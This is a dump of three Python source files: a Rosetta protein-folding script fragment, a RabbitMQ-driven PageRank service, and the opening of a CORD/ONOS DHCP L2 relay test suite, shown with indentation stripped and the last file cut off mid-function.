#modEvent = ModificationEvent('edit','coords', mol.allAtoms)
#mol.geomContainer.updateGeoms(modEvent)
#PMV
#self.GUI.VIEWER.Redraw()
#time.sleep(.1)
#Blender
epmv.insertKeys(model.geomContainer.geoms['cpk'],1)
epmv.getCurrentScene().update()
Draw.Redraw()
Draw.Redraw(1)
Blender.Redraw()
def pmv_load(f):
if not with_pmv: return
mol=self.getMolFromName("test")
if mol is None :
self.readMolecule(f)
mol=self.Mols[0]
for i in range(nDecoys):
mol.allAtoms.addConformation(mol.allAtoms.coords[:])
#mol.name="tset"
print mol.name
#self.displaySticksAndBalls("test",log=1)
self.displayCPK("test:::",log=1)
self.colorAtomsUsingDG("test",log=1)
#cmd.show("cartoon", "decoy")
from rosetta import *
rosetta.init()
pose = Pose(plugDir+"/data/test_fragments.pdb")
dump_pdb(pose, plugDir+"/data/test.pdb")
pmv_load(plugDir+"/data/test.pdb")
pmv_show(pose,self)
scorefxn = core.scoring.ScoreFunction()
scorefxn.set_weight(core.scoring.fa_atr, 1.0)
scorefxn.set_weight(core.scoring.fa_rep, 1.0)
scorefxn.set_weight(core.scoring.hbond_sr_bb, 1.0)
scorefxn.set_weight(core.scoring.hbond_lr_bb, 1.0)
scorefxn.set_weight(core.scoring.hbond_bb_sc, 1.0)
scorefxn.set_weight(core.scoring.hbond_sc, 1.0)
#switch = SwitchResidueTypeSetMover("centroid")
#switch.apply(pose)
#scorefxn = create_score_function("score3")
import random, math, time
def perturb(new_pose,pose):
import random, math, time
res = random.randrange(1,11)
if random.randrange(0,2)==0:
new_pose.set_phi(res, pose.phi(res)+random.gauss(0, 25))
else:
new_pose.set_psi(res, pose.psi(res)+random.gauss(0, 25))
from rosetta.core.fragment import *
fragset = core.fragment.ConstantLengthFragSet(3)
fragset.read_fragment_file(plugDir+"/data/test3_fragments")
movemap = core.kinematics.MoveMap()
movemap.set_bb(True)
mover_3mer = ClassicFragmentMover(fragset,movemap)
log = open("log", 'w')
def fold(pose,self,scorefxn,perturb,mover_3mer,pmv_show):
import random, math, time
kt = 1
print "ok Fold"
low_pose = Pose()
low_score = scorefxn(pose)
new_pose = Pose()
maxit = 1000
start_time = time.time()
stat = {"E":0,"A":0,"R":0}
for it in range(0, maxit):
print "in the loop"
if it==maxit/2: pose.assign(low_pose)
score = scorefxn(pose)
new_pose.assign(pose)
if it<maxit/2: mover_3mer.apply(new_pose)
else: perturb(new_pose,pose)
new_score = scorefxn(new_pose)
delE = new_score-score
if delE<0:
score = new_score
pose.assign(new_pose)
action = "E"
else:
if random.random()<math.exp(-delE/kt):
score = new_score
pose.assign(new_pose)
action = "A"
else: action = "R"
if score<low_score:
low_score = score
low_pose.assign(pose)
print it,"\t",score,"\t",low_score,"\t",action
#log.write(str(score)+"\t"+str(low_score)+"\t"+str(action)+"\n")
stat[action] += 1
if action<>"R": pmv_show(pose,self)
duration = time.time()-start_time
print "took ",duration,"s\t",duration/float(maxit),"s/it"
#print "E:",stat["E"]/float(maxit),"\t","A:",stat["A"]/float(maxit),"\t","R:",stat["R"]/float(maxit)
print low_score
pmv_show(low_pose,self)
return low_pose
def angle(a):
return math.fmod(a,180)
"""
for i in range(0, 1):
pose2 = Pose()
pose2.assign(pose)
low_pose = fold(pose2)
print i,
for i in range(1,11):
log.write(str(angle(low_pose.phi(i)))+"\t"+str(angle(low_pose.psi(i)))+"\n")
import threading
def run(self):
thread = threading.Thread(target=fold, args=(pose,self,scorefxn,perturb,mover_3mer,pmv_show))
thread.setDaemon(1)
thread.start()
"""
import time
time.sleep(1.)
#fold(pose,self)
#import thread
#thread.start_new(fold, (pose,self))
#run(self)
fold(pose,self,scorefxn,perturb,mover_3mer,pmv_show)
|
pagerank.py
|
import os
import sys
import pika
import time
import struct
import platform
import threading
import warnings
import flatbuffers
from functools import partial
from datetime import timedelta
warnings.filterwarnings('ignore', category=RuntimeWarning)
from loguru import logger
from sparqlforhumans.PageRankItem import PageRankItemT
from sparqlforhumans.PageRankResponse import PageRankResponseT
from graph_tool.all import Graph, pagerank
class ProgramOptions:
amp_host = 'amqp://guest:guest@rabbitmq/?connection_attempts=10'
ids_queue = 'id-pairs-pagerank'
request_queue = 'request-pagerank'
response_queue = 'response-pagerank'
class ReconnectionException(Exception):
pass
class BinaryStorage:
def __init__(self, path, read_only=False) -> None:
self.__b = bytearray()
self.__read_only = read_only
self.__path = None
self.__write_to_disk_threshold = 256 * 1000 * 1000 # bytes
if self.__write_to_disk_threshold % 4 != 0:
raise ValueError('BinaryStorage.__write_to_disk_threshold must be a multiplier of 4!')
self.__path = path
if os.path.exists(self.__path) and not self.__read_only:
logger.warning('Deleting existing data file: {}'.format(self.__path))
os.remove(self.__path)
# The binary format is: |QID|LEN|0|1|....|LEN-1|QID|LEN|0|1|....
def __setitem__(self, key, value):
if self.__read_only:
return
v = int(key).to_bytes(4, 'little') + len(value).to_bytes(4, 'little')
for i in value:
v += int(i).to_bytes(4, 'little')
self.__b += v
if len(self.__b) > self.__write_to_disk_threshold:
self.__sync_to_disk()
def __sync_to_disk(self):
if self.__read_only:
return
logger.info('BinaryStorage.__sync_to_disk called!')
with open(self.__path, 'ab') as fp:
fp.write(self.__b)
self.__b = bytearray()
logger.info('BinaryStorage.__sync_to_disk done!')
def get_graph_edges(self):
self.__sync_to_disk()
with open(self.__path, 'rb') as fp:
qid = None
length = 0
count = 0
reading_qid = True
reading_len = False
for chunk in iter(partial(fp.read, self.__write_to_disk_threshold), b''):
i = 0
read = 0
while read < len(chunk):
node = chunk[i * 4 : i * 4 + 4]
if reading_qid:
qid = int.from_bytes(node, 'little')
reading_qid = False
reading_len = True
elif reading_len:
length = int.from_bytes(node, 'little')
reading_len = False
else:
graph_node = int.from_bytes(node, 'little')
count += 1
if count == length:
reading_qid = True
count = 0
yield qid, graph_node
i += 1
read += 4
class GraphBuilder:
def __init__(self):
self.__v = BinaryStorage('/data/pagerank.bin', read_only=False)
self.__count = 0
def add_relations(self, sid, objs):
self.__v[str(sid)] = objs
self.__count += len(objs)
def get_pagerank_values(self):
start = time.time()
logger.info('Started call to get_pagerank')
g = Graph()
vp = g.add_edge_list(self.__v.get_graph_edges(), hashed=True, hash_type='int')
logger.info('Delta time to build graph: {}s'.format(timedelta(seconds=(time.time() - start))))
start = time.time()
ranks = pagerank(g)
logger.info('Delta time to compute pagerank: {}s'.format(timedelta(seconds=(time.time() - start))))
for vertex in g.vertices():
qid = vp[vertex]
r = ranks[vertex]
yield qid, r
class PageRankSubscriber:
def __init__(self, dont_wait_send_ranks=False, local_only=False) -> None:
self.__ops = self.__read_options()
self.__builder = GraphBuilder()
self.__parsed = 0
self.__debug_rate = 1_000_000
self.__response_size = 200_000
self.__channel = None
self.__dont_wait = dont_wait_send_ranks
self.__local_only = local_only
def __message_callback(self, body):
if len(body) <= 4:
return
sid = struct.unpack('<I', body[:4])[0]
objs = []
s = 4
e = 8
while e <= len(body):
oid = struct.unpack('<I', body[s:e])[0]
objs.append(oid)
s += 4
e += 4
objs = tuple(objs)
self.__builder.add_relations(sid, objs)
self.__parsed += 1
if self.__parsed % self.__debug_rate == 0:
logger.debug('Current number of parsed items: {}'.format(self.__parsed))
def __publish_ranks(self, chunk, count=0):
logger.info('Building and sending batch N={} of size {}'.format(count, len(chunk)))
builder = flatbuffers.Builder(initialSize=0)
i = PageRankResponseT()
i.values = chunk
table = i.Pack(builder)
builder.Finish(table)
data = builder.Output()
if not self.__local_only:
self.__ensure_send_data(self.__ops.response_queue, data)
def __ensure_send_data(self, queue, data):
while True:
try:
self.__channel.basic_publish(exchange='', routing_key=queue, body=data)
break
except Exception as ex:
logger.warning("Got exception: {}, waiting 5 seconds before next try".format(ex))
time.sleep(5)
def __publish_done(self, count):
data = bytearray()
data += (1).to_bytes(1, 'little')
data += count.to_bytes(4, 'little')
if not self.__local_only:
self.__ensure_send_data(self.__ops.response_queue, data)
def __run_pagerank(self):
start = time.time()
logger.info('Started call to __compute_and_publish_pagerank')
chunk = []
batch_count = 0
for qid, rank in self.__builder.get_pagerank_values():
i = PageRankItemT()
i.id = qid
i.rank = rank
chunk.append(i)
if len(chunk) >= self.__response_size:
self.__publish_ranks(chunk, count=batch_count)
batch_count += 1
chunk = []
if len(chunk) > 0:
self.__publish_ranks(chunk, count=batch_count)
batch_count += 1
self.__publish_done(batch_count)
logger.info('Total number of batches: {}'.format(batch_count))
logger.info('Delta time in __compute_and_publish_pagerank: {}s'.format(timedelta(seconds=(time.time() - start))))
def __compute_and_publish_pagerank(self):
th = threading.Thread(target=self.__run_pagerank)
th.daemon = True
th.start()
def __setup_connection(self):
parameters = pika.URLParameters(self.__ops.amp_host)
self.__con = pika.SelectConnection(
parameters=parameters,
on_open_callback=self.__on_connection_open,
on_open_error_callback=self.__on_close_error,
on_close_callback=self.__on_close_error
)
def __on_close_error(self, connection, ex):
logger.warning('Connection closed: {}! Connecting again'.format(ex))
time.sleep(5)
raise ReconnectionException()
def __on_channel_ready(self, channel):
channel.queue_declare(queue=self.__ops.ids_queue)
channel.queue_declare(queue=self.__ops.request_queue)
channel.queue_declare(queue=self.__ops.response_queue)
build_callback = lambda ch, method, props, body: self.__message_callback(body)
compute_callback = lambda ch, method, props, body: self.__compute_and_publish_pagerank()
channel.basic_consume(queue=self.__ops.ids_queue, on_message_callback=build_callback, auto_ack=True)
channel.basic_consume(queue=self.__ops.request_queue, on_message_callback=compute_callback, auto_ack=True)
logger.info('Connection Ready')
self.__channel = channel
if self.__dont_wait:
self.__compute_and_publish_pagerank()
def __on_connection_open(self, connection):
connection.channel(on_open_callback=self.__on_channel_ready)
def run(self):
if self.__local_only:
self.__compute_and_publish_pagerank()
return
while True:
try:
logger.info("Starting a new ioloop")
self.__setup_connection()
self.__con.ioloop.start()
except KeyboardInterrupt:
self.__con.close()
break
except ReconnectionException:
if not self.__con.is_closed:
self.__con.close()
def __read_options(self) -> ProgramOptions:
return ProgramOptions()
if __name__ == '__main__':
logger.remove()
logger.add(sys.stderr, level='DEBUG', enqueue=True)
logger.info('Starting. Running in Python {}'.format(platform.python_version()))
sub = PageRankSubscriber(dont_wait_send_ranks=False, local_only=False)
sub.run()
logger.info('Done')
|
dhcpl2relayTest.py
|
# Copyright 2017-present Open Networking Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Copyright 2016-present Ciena Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF AeY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
from nose.tools import *
from nose.twistedtools import reactor, deferred
from twisted.internet import defer
import time
import os, sys, re, json
from DHCP import DHCPTest
from CordTestUtils import get_mac, log_test, getstatusoutput, get_controller
from SSHTestAgent import SSHTestAgent
from OnosCtrl import OnosCtrl
from onosclidriver import OnosCliDriver
from OltConfig import OltConfig
from CordTestServer import cord_test_onos_restart, cord_test_ovs_flow_add,cord_test_onos_shutdown
from CordTestConfig import setup_module, teardown_module
from CordLogger import CordLogger
from portmaps import g_subscriber_port_map
from CordContainer import Onos
from VolthaCtrl import VolthaCtrl
import threading, random
from threading import current_thread
import requests
log_test.setLevel('INFO')
class dhcpl2relay_exchange(CordLogger):
VOLTHA_HOST = None
VOLTHA_REST_PORT = VolthaCtrl.REST_PORT
VOLTHA_ENABLED = bool(int(os.getenv('VOLTHA_ENABLED', 0)))
VOLTHA_OLT_TYPE = 'simulated_olt'
VOLTHA_OLT_MAC = '00:0c:e2:31:12:00'
VOLTHA_UPLINK_VLAN_MAP = { 'of:0000000000000001' : '222' }
TAGGED_TRAFFIC = False
app = 'org.opencord.dhcpl2relay'
sadis_app = 'org.opencord.sadis'
app_dhcp = 'org.onosproject.dhcp'
app_olt = 'org.onosproject.olt'
relay_interfaces = ()
relay_interfaces_last = ()
interface_to_mac_map = {}
relay_vlan_map = {}
host_ip_map = {}
test_path = os.path.dirname(os.path.realpath(__file__))
dhcp_data_dir = os.path.join(test_path, '..', 'setup')
dhcpl2_app_file = os.path.join(test_path, '..', 'apps/dhcpl2relay-1.0.0.oar')
olt_app_file = os.path.join(test_path, '..', 'apps/olt-app-3.0-SNAPSHOT.oar')
sadis_app_file = os.path.join(test_path, '..', 'apps/sadis-app-1.0.0-SNAPSHOT.oar')
olt_conf_file = os.getenv('OLT_CONFIG_FILE', os.path.join(test_path, '..', 'setup/olt_config_voltha_local.json'))
default_config = { 'default-lease-time' : 600, 'max-lease-time' : 7200, }
default_options = [ ('subnet-mask', '255.255.255.0'),
('broadcast-address', '192.168.1.255'),
('domain-name-servers', '192.168.1.1'),
('domain-name', '"mydomain.cord-tester"'),
]
default_subnet_config = [ ('192.168.1.2',
'''
subnet 192.168.1.0 netmask 255.255.255.0 {
range 192.168.1.10 192.168.1.100;
}
'''), ]
lock = threading.Condition()
ip_count = 0
failure_count = 0
start_time = 0
diff = 0
transaction_count = 0
transactions = 0
running_time = 0
total_success = 0
total_failure = 0
#just in case we want to reset ONOS to default network cfg after relay tests
onos_restartable = bool(int(os.getenv('ONOS_RESTART', 0)))
configs = {}
sadis_configs = {}
default_onos_netcfg = {}
voltha_switch_map = None
remote_dhcpd_cmd = []
ONOS_INSTANCES = 3
relay_device_id = None
@classmethod
def update_apps_version(cls):
version = Onos.getVersion()
major = int(version.split('.')[0])
minor = int(version.split('.')[1])
dhcpl2_app_version = '1.0.0'
sadis_app_version = '3.0-SNAPSHOT'
cls.dhcpl2_app_file = os.path.join(cls.test_path, '..', 'apps/dhcpl2relay-{}.oar'.format(dhcpl2_app_version))
cls.sadis_app_file = os.path.join(cls.test_path, '..', 'apps/sadis-app-{}.oar'.format(sadis_app_version))
@classmethod
def setUpClass(cls):
''' Activate the cord dhcpl2relay app'''
cls.update_apps_version()
OnosCtrl(cls.app_dhcp).deactivate()
time.sleep(3)
cls.onos_ctrl = OnosCtrl(cls.app)
status, _ = cls.onos_ctrl.activate()
#assert_equal(status, True)
time.sleep(3)
status, _ = OnosCtrl(cls.sadis_app).activate()
#assert_equal(status, True)
time.sleep(3)
cls.setup_dhcpd()
cls.default_onos_netcfg = OnosCtrl.get_config()
def setUp(self):
super(dhcpl2relay_exchange, self).setUp()
#self.dhcp_l2_relay_setup()
#self.cord_sadis_load()
#self.cord_l2_relay_load()
def tearDown(self):
super(dhcpl2relay_exchange, self).tearDown()
#OnosCtrl.uninstall_app(self.dhcpl2_app_file)
#OnosCtrl.uninstall_app(self.sadis_app_file)
#OnosCtrl.uninstall_app(self.olt_app_file)
@classmethod
def tearDownClass(cls):
'''Deactivate the cord dhcpl2relay app'''
cls.onos_load_config(cls.default_onos_netcfg)
#cls.onos_ctrl.deactivate()
#OnosCtrl(cls.sadis_app).deactivate()
#OnosCtrl(cls.app_olt).deactivate()
@classmethod
def setup_dhcpd(cls, boot_delay = 5):
device_details = OnosCtrl.get_devices(mfr = 'Nicira')
## Assuming only one OVS is detected on ONOS and its for external DHCP server connect point...
if device_details is not None:
did_ovs = device_details[0]['id']
else:
log_test.info('On this DHCPl2relay setup, onos does not have ovs device where external DHCP server is have connect point, so return with false status')
return False
cls.relay_device_id = did_ovs
device_details = OnosCtrl.get_devices()
if device_details is not None:
for device in device_details:
if device['available'] is True and device['driver'] == 'voltha':
cls.olt_serial_id = "{}".format(device['serial'])
break
else:
cls.olt_serial_id = " "
else:
log_test.info('On this DHCPl2relay setup, onos does not have ovs device where external DHCP server is have connect point, so return with false status')
return False
if cls.service_running("/usr/sbin/dhcpd"):
print('DHCPD already running in container')
return True
setup_for_relay = cls.dhcp_l2_relay_setup()
cls.cord_l2_relay_load()
cls.voltha_setup()
return True
# dhcp_start_status = cls.dhcpd_start()
# if setup_for_relay and dhcp_start_status:
# return True
# return False
@classmethod
def config_olt(cls, switch_map):
controller = get_controller()
auth = ('karaf', 'karaf')
#configure subscriber for every port on all the voltha devices
for device, device_map in switch_map.iteritems():
uni_ports = device_map['ports']
uplink_vlan = device_map['uplink_vlan']
for port in uni_ports:
vlan = port
rest_url = 'http://{}:8181/onos/olt/oltapp/{}/{}/{}'.format(controller,
device,
port,
vlan)
requests.post(rest_url, auth = auth)
@classmethod
def voltha_setup(cls):
s_tag_map = {}
#configure olt app to provision dhcp flows
cls.config_olt(cls.voltha_switch_map)
for switch, switch_map in cls.voltha_switch_map.iteritems():
s_tag_map[int(switch_map['uplink_vlan'])] = map(lambda p: int(p), switch_map['ports'])
cmd_list = []
relay_interface = cls.relay_interfaces[0]
cls.relay_vlan_map[relay_interface] = []
for s_tag, ports in s_tag_map.iteritems():
vlan_stag_intf = '{}.{}'.format(relay_interface, s_tag)
cmd = 'ip link add link %s name %s type vlan id %d' %(relay_interface, vlan_stag_intf, s_tag)
cmd_list.append(cmd)
cmd = 'ip link set %s up' %(vlan_stag_intf)
cmd_list.append(cmd)
for port in ports:
vlan_ctag_intf = '{}.{}.{}'.format(relay_interface, s_tag, port)
cmd = 'ip link add link %s name %s type vlan id %d' %(vlan_stag_intf, vlan_ctag_intf, port)
cmd_list.append(cmd)
cmd = 'ip link set %s up' %(vlan_ctag_intf)
cmd_list.append(cmd)
cls.relay_vlan_map[relay_interface].append(vlan_ctag_intf)
cls.relay_vlan_map[relay_interface].append(vlan_stag_intf)
for cmd in cmd_list:
log_test.info('Running command: %s' %cmd)
os.system(cmd)
cord_test_ovs_flow_add(cls.relay_interface_port)
for s_tag in s_tag_map.keys():
log_test.info('Configuring OVS flow for port %d, s_tag %d' %(cls.relay_interface_port, s_tag))
cord_test_ovs_flow_add(cls.relay_interface_port, s_tag)
@classmethod
def service_running(cls, pattern):
st, output = getstatusoutput('pgrep -f "{}"'.format(pattern))
return True if st == 0 else False
@classmethod
def dhcpd_conf_generate(cls, config = default_config, options = default_options,
subnet = default_subnet_config):
conf = ''
for k, v in config.items():
conf += '{} {};\n'.format(k, v)
opts = ''
for k, v in options:
opts += 'option {} {};\n'.format(k, v)
subnet_config = ''
for _, v in subnet:
subnet_config += '{}\n'.format(v)
return '{}{}{}'.format(conf, opts, subnet_config)
@classmethod
def dhcpd_start(cls, intf_list = None,
config = default_config, options = default_options,
subnet = default_subnet_config):
'''Start the dhcpd server by generating the conf file'''
if intf_list is None:
intf_list = cls.relay_interfaces
intf_list = list(intf_list)
##stop dhcpd if already running
#cls.dhcpd_stop()
dhcp_conf = cls.dhcpd_conf_generate(config = config, options = options,
subnet = subnet)
##first touch dhcpd.leases if it doesn't exist
lease_file = '{}/dhcpd.leases'.format(cls.dhcp_data_dir)
if os.access(lease_file, os.F_OK) is False:
with open(lease_file, 'w') as fd: pass
lease_file_tagged = '{}/dhcpd-tagged.leases'.format(cls.dhcp_data_dir)
if os.access(lease_file_tagged, os.F_OK) is False:
with open(lease_file_tagged, 'w') as fd: pass
conf_file = '{}/dhcpd.conf'.format(cls.dhcp_data_dir)
with open(conf_file, 'w') as fd:
fd.write(dhcp_conf)
conf_file_tagged = '{}/dhcpd-tagged.conf'.format(cls.dhcp_data_dir)
with open(conf_file_tagged, 'w') as fd:
fd.write(dhcp_conf)
#now configure the dhcpd interfaces for various subnets
index = 0
intf_info = []
vlan_intf_list = []
for ip,_ in subnet:
vlan_intf = None
intf = intf_list[index]
if intf in cls.relay_vlan_map:
vlan_intf = cls.relay_vlan_map[intf][0]
vlan_intf_list.append(vlan_intf)
mac = cls.get_mac(intf)
intf_info.append((ip, mac))
index += 1
cmd = 'ifconfig {} {}'.format(intf, ip)
status = os.system(cmd)
if vlan_intf:
cmd = 'ifconfig {} {}'.format(vlan_intf, ip)
os.system(cmd)
intf_str = ','.join(intf_list)
dhcpd_cmd = '/usr/sbin/dhcpd -4 --no-pid -cf {0} -lf {1} {2}'.format('/root/test/src/test/setup/dhcpd.conf','/root/test/src/test/setup/dhcpd.leases', intf_str)
print('Starting DHCPD server with command: %s' %dhcpd_cmd)
status = os.system(dhcpd_cmd)
vlan_intf_str = ','.join(vlan_intf_list)
dhcpd_cmd = '/usr/sbin/dhcpd -4 --no-pid -cf {0} -lf {1} {2}'.format('/root/test/src/test/setup/dhcpd-tagged.conf','/root/test/src/test/setup/dhcpd-tagged.leases', vlan_intf_str)
print('Starting DHCPD server with command: %s' %dhcpd_cmd)
status = os.system(dhcpd_cmd)
if status > 255:
status = 1
else:
return False
time.sleep(3)
cls.relay_interfaces_last = cls.relay_interfaces
cls.relay_interfaces = intf_list
return True
@classmethod
def get_dhcpd_process(cls):
docker_cmd = 'docker exec cord-tester1'
cmd = '{} ps -eaf | grep dhcpd'.format(docker_cmd)
dhcpd_server_ip = get_controller()
server_user = 'ubuntu'
server_pass = 'ubuntu'
ssh_agent = SSHTestAgent(host = dhcpd_server_ip, user = server_user, password = server_user)
status, output = ssh_agent.run_cmd(cmd)
assert_equal(status, True)
if output:
cls.remote_dhcpd_cmd = re.findall('(?<=/)\w+.*', output)
log_test.info('DHCP server running on remote host and list of service commands are \n %s'%cls.remote_dhcpd_cmd)
assert_equal(status, True)
return cls.remote_dhcpd_cmd
def dhcpd_stop(self, remote_controller = False, dhcpd = None):
if remote_controller is not True:
if cls.service_running("/usr/sbin/dhcpd"):
cmd = 'pkill -9 dhcpd'
st, _ = getstatusoutput(cmd)
return True if st == 0 else False
else:
docker_cmd = 'docker exec cord-tester1'
dhcpd_server_ip = get_controller()
server_user = 'ubuntu'
server_pass = 'ubuntu'
service_satatus = True
ssh_agent = SSHTestAgent(host = dhcpd_server_ip, user = server_user, password = server_user)
if dhcpd == 'stop':
status, output = ssh_agent.run_cmd('{} pkill -9 dhcpd'.format(docker_cmd))
service_satatus = status and True
elif dhcpd == 'start':
for cmd in self.remote_dhcpd_cmd:
dhcpd_cmd = ' {0} /{1}'.format(docker_cmd,cmd)
status, output = ssh_agent.run_cmd(dhcpd_cmd)
service_satatus = status and True
elif dhcpd == 'restart':
status, output = ssh_agent.run_cmd('{} pkill -9 dhcpd'.format(docker_cmd))
service_satatus = status and True
for cmd in self.remote_dhcpd_cmd:
dhcpd_cmd = ' {0} /{1}'.format(docker_cmd,cmd)
status, output = ssh_agent.run_cmd(dhcpd_cmd)
service_satatus = status and True
return service_satatus
@classmethod
def dhcp_l2_relay_setup(cls):
device_details = OnosCtrl.get_devices(mfr = 'Nicira')
if device_details is not None:
did_ovs = device_details[0]['id']
else:
log_test.info('On this DHCPl2relay setup, onos does not have ovs device where external DHCP server is have connect point, so return with false status')
return False
cls.relay_device_id = did_ovs
cls.olt = OltConfig(olt_conf_file = cls.olt_conf_file)
cls.port_map, _ = cls.olt.olt_port_map()
if cls.port_map:
##Per subscriber, we use 1 relay port
try:
relay_port = cls.port_map[cls.port_map['relay_ports'][0]]
except:
relay_port = cls.port_map['uplink']
cls.relay_interface_port = relay_port
cls.relay_interfaces = (cls.port_map[cls.relay_interface_port],)
else:
cls.relay_interface_port = 100
cls.relay_interfaces = (g_subscriber_port_map[cls.relay_interface_port],)
cls.relay_interfaces_last = cls.relay_interfaces
if cls.port_map:
##generate a ip/mac client virtual interface config for onos
interface_list = []
for port in cls.port_map['ports']:
port_num = cls.port_map[port]
if port_num == cls.port_map['uplink']:
continue
ip = cls.get_host_ip(port_num)
mac = cls.get_mac(port)
interface_list.append((port_num, ip, mac))
#configure dhcp server virtual interface on the same subnet as first client interface
relay_ip = cls.get_host_ip(interface_list[0][0])
relay_mac = cls.get_mac(cls.port_map[cls.relay_interface_port])
interface_list.append((cls.relay_interface_port, relay_ip, relay_mac))
cls.onos_interface_load(interface_list)
@classmethod
def dhcp_l2_relay_cleanup(cls):
##reset the ONOS port configuration back to default
for config in cls.configs.items():
OnosCtrl.delete(config)
cls.onos_load_config(cls.default_onos_config)
# if cls.onos_restartable is True:
# log_test.info('Cleaning up dhcp relay config by restarting ONOS with default network cfg')
# return cord_test_onos_restart(config = {})
@classmethod
def onos_load_config(cls, config):
status, code = OnosCtrl.config(config)
if status is False:
log_test.info('JSON request returned status %d' %code)
assert_equal(status, True)
time.sleep(3)
@classmethod
def onos_delete_config(cls, config):
status, code = OnosCtrl.delete(config)
if status is False:
log_test.info('JSON request returned status %d' %code)
assert_equal(status, True)
time.sleep(3)
@classmethod
def onos_interface_load(cls, interface_list):
interface_dict = { 'ports': {} }
for port_num, ip, mac in interface_list:
port_map = interface_dict['ports']
port = '{}/{}'.format(cls.relay_device_id, port_num)
port_map[port] = { 'interfaces': [] }
interface_list = port_map[port]['interfaces']
interface_map = { 'ips' : [ '{}/{}'.format(ip, 24) ],
'mac' : mac,
'name': 'vir-{}'.format(port_num)
}
interface_list.append(interface_map)
cls.onos_load_config(interface_dict)
cls.configs['interface_config'] = interface_dict
@classmethod
def cord_l2_relay_load(cls, dhcp_server_connectPoint = None, delete = False):
##read the current config
current_netcfg = OnosCtrl.get_config()
connect_points = set([])
try:
connect_points = set(current_netcfg['apps']['org.opencord.dhcpl2relay']['dhcpl2relay']['dhcpServerConnectPoints'])
except KeyError, e:
pass
OnosCtrl.uninstall_app(cls.dhcpl2_app_file)
relay_device_map = '{}/{}'.format(cls.relay_device_id, cls.relay_interface_port)
#### We have to work on later versions by removing these hard coded values
if dhcp_server_connectPoint is None:
relay_device_present = filter(lambda cp: cp.split('/')[0] == cls.relay_device_id, connect_points)
if not relay_device_present:
connect_points.add(relay_device_map)
else:
cps_unused = map(lambda cp: connect_points.add(cp), dhcp_server_connectPoint)
connect_points = list(connect_points)
dhcp_dict = { "apps" : { "org.opencord.dhcpl2relay" : {"dhcpl2relay" :
{"dhcpServerConnectPoints": connect_points}
}
}
}
#OnosCtrl.uninstall_app(cls.dhcpl2_app_file)
OnosCtrl.install_app(cls.dhcpl2_app_file)
if delete == False:
cls.onos_load_config(dhcp_dict)
else:
cls.onos_delete_config(dhcp_dict)
cls.onos_load_config(cls.default_onos_config)
cls.configs['relay_config'] = dhcp_dict
@classmethod
def cord_sadis_load(cls, sadis_info = None):
relay_device_id = '{}'.format(cls.relay_device_id)
device_details = OnosCtrl.get_devices()
if device_details is not None:
for device in device_details:
## Assuming only one OVS is detected on ONOS and its for external DHCP server connect point...
if device['available'] is True and device['driver'] == 'voltha':
cls.olt_serial_id = "{}".format(device['serial'])
else:
cls.olt_serial_id = " "
else:
log_test.info('On this DHCPl2relay setup, onos does not have Tibit device where DHCP client is connected on UNI point, so return with false status')
return False
sadis_dict = { "apps": {
"org.opencord.sadis": {
"sadis": {
"integration": {
"cache": {
"enabled": "true",
"maxsize": 50,
"ttl": "PT1m"
}
},
"entries": [{
"id": "uni-254",
"cTag": 202,
"sTag": 222,
"nasPortId": "uni-254"
},
{
"id": cls.olt_serial_id,
"hardwareIdentifier": "00:0c:e2:31:05:00",
"ipAddress": "172.17.0.1",
"nasId": "B100-NASID"
}
]
}
}
}
}
#OnosCtrl.uninstall_app(cls.olt_app_file)
OnosCtrl.install_app(cls.olt_app_file)
time.sleep(5)
#OnosCtrl.uninstall_app(cls.sadis_app_file)
OnosCtrl.install_app(cls.sadis_app_file)
if sadis_info:
sadis_dict = sadis_info
cls.onos_load_config(sadis_dict)
cls.sadis_configs['relay_config'] = sadis_dict
def sadis_info_dict(self, subscriber_port_id =None, c_tag = None, s_tag = None, nas_port_id =None,olt_serial_id =None,olt_mac=None,olt_ip =None,olt_nas_id=None):
### Need to work on these hard coded values on later merges
if subscriber_port_id is None:
subscriber_port_id = "uni-254"
if c_tag is None:
c_tag = 202
if s_tag is None:
s_tag = 222
if nas_port_id is None:
nas_port_id = "uni-254"
if olt_serial_id is None:
olt_serial_id = self.olt_serial_id
if olt_mac is None:
olt_mac = "00:0c:e2:31:05:00"
if olt_ip is None:
olt_ip = "172.17.0.1"
if olt_nas_id is None:
olt_nas_id = "B100-NASID"
sadis_dict = { "apps": {
"org.opencord.sadis": {
"sadis": {
"integration": {
"cache": {
"enabled": "true",
"maxsize": 50,
"ttl": "PT1m"
}
},
"entries": [{
"id": subscriber_port_id,
"cTag": c_tag,
"sTag": s_tag,
"nasPortId": nas_port_id
},
{
"id": olt_serial_id,
"hardwareIdentifier": olt_mac,
"ipAddress": olt_ip,
"nasId": olt_nas_id
}
]
}
}
}
}
return sadis_dict
@classmethod
def get_host_ip(cls, port):
if cls.host_ip_map.has_key(port):
return cls.host_ip_map[port]
cls.host_ip_map[port] = '192.168.100.{}'.format(port)
return cls.host_ip_map[port]
@classmethod
def host_load(cls, iface):
'''Have ONOS discover the hosts for dhcp-relay responses'''
port = g_subscriber_port_map[iface]
host = '173.17.1.{}'.format(port)
cmds = ( 'ifconfig {} 0'.format(iface),
'ifconfig {0} {1}'.format(iface, host),
'arping -I {0} {1} -c 2'.format(iface, host),
'ifconfig {} 0'.format(iface), )
for c in cmds:
os.system(c)
@classmethod
def get_mac(cls, iface):
if cls.interface_to_mac_map.has_key(iface):
return cls.interface_to_mac_map[iface]
mac = get_mac(iface, pad = 0)
cls.interface_to_mac_map[iface] = mac
return mac
def dhcpl2relay_stats_calc(self, success_rate = False, only_discover = False, iface = 'veth0'):
self.ip_count = 0
self.failure_count = 0
self.start_time = 0
self.diff = 0
self.transaction_count = 0
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '182.17.0.1', iface = iface)
self.start_time = time.time()
while self.diff <= 60:
if only_discover:
